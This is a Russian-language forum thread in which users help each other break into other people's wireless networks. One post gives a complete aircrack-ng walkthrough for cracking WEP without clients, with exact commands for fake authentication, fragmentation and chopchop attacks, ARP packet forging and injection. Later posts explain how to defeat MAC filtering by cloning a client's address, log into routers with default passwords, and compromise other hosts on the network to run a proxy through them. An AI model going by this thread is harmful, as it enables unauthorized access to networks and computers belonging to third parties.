Как спровоцировть AP на data пакет Есть перспекивный AP с WEP, но не видать data пакетов и клиентов. Могу даже предположить IP адрес. Вопрос знатокам - как раскрутить точку хотябы на 4 пакета данных ? (Мне и 4 хватит )
Without clients: 1 - Set the wireless card MAC address 2 - Start the wireless interface in monitor mode on the specific AP channel 3 - Use aireplay-ng to do a fake authentication with the access point 4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA 5 - Use packetforge-ng to create an arp packet using the PRGA obtain in the previous step 6 - Start airodump-ng on AP channel with filter for bssid to collect the new unique \ 7 - Inject the arp packet created in step 5 8 - Run aircrack-ng to crack key using the IVs collected 1. ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 2. airmon-ng start wlan0 9 3. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 mon0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:11:22:33:44:55 is our card MAC address mon0 is the wireless interface name 4. aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 mon0 ... -5 means the fragmentation attack -b 00:14:6C:7E:40:80 is the access point MAC address -h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication mon0 is the wireless interface name Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet. If the fragmentation attack was not successful, you can then try the chopchop technique next. Run: aireplay-ng -4 -h 00:11:22:33:44:55 -b 00:14:6C:7E:40:80 mon0 -4 means the chop-chop attack -b 00:14:6C:7E:40:80 is the access point MAC address -h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication mon0 is the wireless interface name Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet. 5. packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request -0 means generate an arp packet -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:11:22:33:44:55 is MAC address of our card -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255) -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255) -y fragment-0203-180343.xor is file to read the PRGA from -w arp-request is name of file to write the arp packet to The system will respond: Wrote packet to: arp-request 6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture mon0 7. Using the console session where you generated the arp packet, enter: aireplay-ng -2 -r arp-request mon0 8. aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap ====================================================================================== aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -r capture-01.cap ath0
Спасибо кормилец ! Уже для этого пункта нужен хоть какой-никакой, завалящий data пакет... Иначе дальше не двинется ... Не надо мне man-ы копипастить ...
Ну хорошо. Первое - красным (если это не статья) пишут только модеры. Второе - ты можешь ассоциировать себя с точкой, и сам нарегенить пакетов. Третье - не стоит думать, что ты открыл Америку, и до тебя этим вопросом никто не задавался.
Первое - принято (Ку три раза ) Второе - А вот с этого места, можно подробнее ! Это как ? нагенерировать ??? (Ассоциация работает, инжекция тоже, сигнал нормальный) Как генерить ??? Третье - не понял ... если легко "нарегенить пакетов" подскажите пожалуйста ! КАК ? (На лавры Коллумба или Эрика рыжего не претендую)
Уважаемый ! Если-бы можно мыло "нагенерить" валидных data пакетов, имея одни beacon. То все-бы только этим и занимались, а не пытались перехватывать реальные пакеты ! Если Вы не в курсе или это не возможно, так и скажите. А не занимайтесь копипастом известной информации. Q
http://www.youtube.com/results?search_query=aircrack+%2B+wep+%2B+no+clients&oq=aircrack+%2B+wep+%2B+no+clients&aq=f&aqi=&aql=1&gs_sm=e&gs_upl=1577l12782l0l12947l31l31l2l9l1l1l263l3889l0.9.11l20l0 В первом же мувике действия из фака продемонстрированы.
Уважаемый ! Если-бы Вы были внимательны, то во всех примерах увидели-бы сообщение "Waiting for data packet" и только после получения data пакета, всё можно сдвинуть с мёртвой точки ! А вот data пакетов нет ... совсем ... Спасибо за беспокойство, но Вы до сих пор не поняли сути вопроса
Так и не могу разобраться... В общем есть сеть ( IP-LINK HOME ) Открытая! Подключаюсь к ней, пишет: Без доступа к интернету. Как узнать фильтр по макам ли там? мак клиента подключаемого к сети есть, а вот как его присвоить своей карте и приконнектится, или же дело не в маке , а еще в чем то как проверить, можно инструкцию? МАС адрес на карте Alfa сначало в винде менялся нормально, а теперь вообще не хочет менять. В linux меняет. как с linuxa например с подменой мака подключится, хотя врятли там фильтр по макам. Еще есть сеть открытая , а подключение вообще не проходит, ничего не происходит, сигнал отличный, как понять где какая защита и как её обойти? Спасибо
Посмотри какой IP получает при подключении. Если стандартный 192* то значит там просто нет интернета. А если что-то типа 169* или если вообще не подключает то там защита по mac. Сканируешь точку и смотришь кто к ней подключаеться . Записываешь его mac. Ждешь когда он выходит или отключаешь его от точки. С помощью macchanger меняешь свой mac в linux на тот что записала и подключаешься к точке. Подключаться к точке мне нравиться больше всего через Wicd. Далее подключившись смотрите свой ip опять если он к примеру 192.168.1.2 то заходите через браузер на 192.168.1.1. Он вам скорее всего скажет что за модель роутера к которому вы хотите подрубится. В инете ищете стандартные логин и пароль к нему и логинетесь и добавляете свой mac в список разрешенных.
cardons молодец........ ! кстати бенкон пакеты не идут када сигнал плохой надо быть по ближе к антенне , или использовать направленную трубу ...
Так, сейчас подключился к сетке IP: 192.168.0.27 , я так понял что нету там инета, так? тогда что за клиенты то и дело подключаются и отключаются? И вопрос такой как сменить в backtrack свой мак? вернее как задать определенный? а то только рандомный ставил.
1. название провайдера 2. желательно мен в аську стукнуть 3. точка далеко - тут можно много расписывать вокруг да около ... в асю стукни или личку .. (что б не флудить) кстати ты читал фак по форуму и не один из вариантов не подошел ?
Хочу добавить что у точки на ip 192.168.0.2 весит DWL-3200AP - D-Link запрашивая логин и пасс, какие у него дефолтные знает кто?
Логин admin без пароля. Ну или попробуй в оба вписать admin. Раз вам показывает страницу авторизацию роутера то нету там защиты по маку ) Иначе бы вас не пустило бы. Значит просто там сетка без инета ) Но и тут есть свои плюсы) Раз вы попали в сеть и особенно незащищенную сеть. То ищете к примеру все 80 порты в сети. И чекаете потом их на существования админ панелей,phpmyadmin и т.д... Через них ломаете другой комп это очень просто т.к. скорее всего стандартные логины пароли или их вообще нет и потом вешаете туда прокси и сидите через него ) В общем везде свои плюсы надо только их искать
cardons Спасибо! Наставил на путь истеный Так вот, нашел я в этой сетке 2 компа с ip типа 192.168... Вот это интересует поподробнее чем лучше это сделать?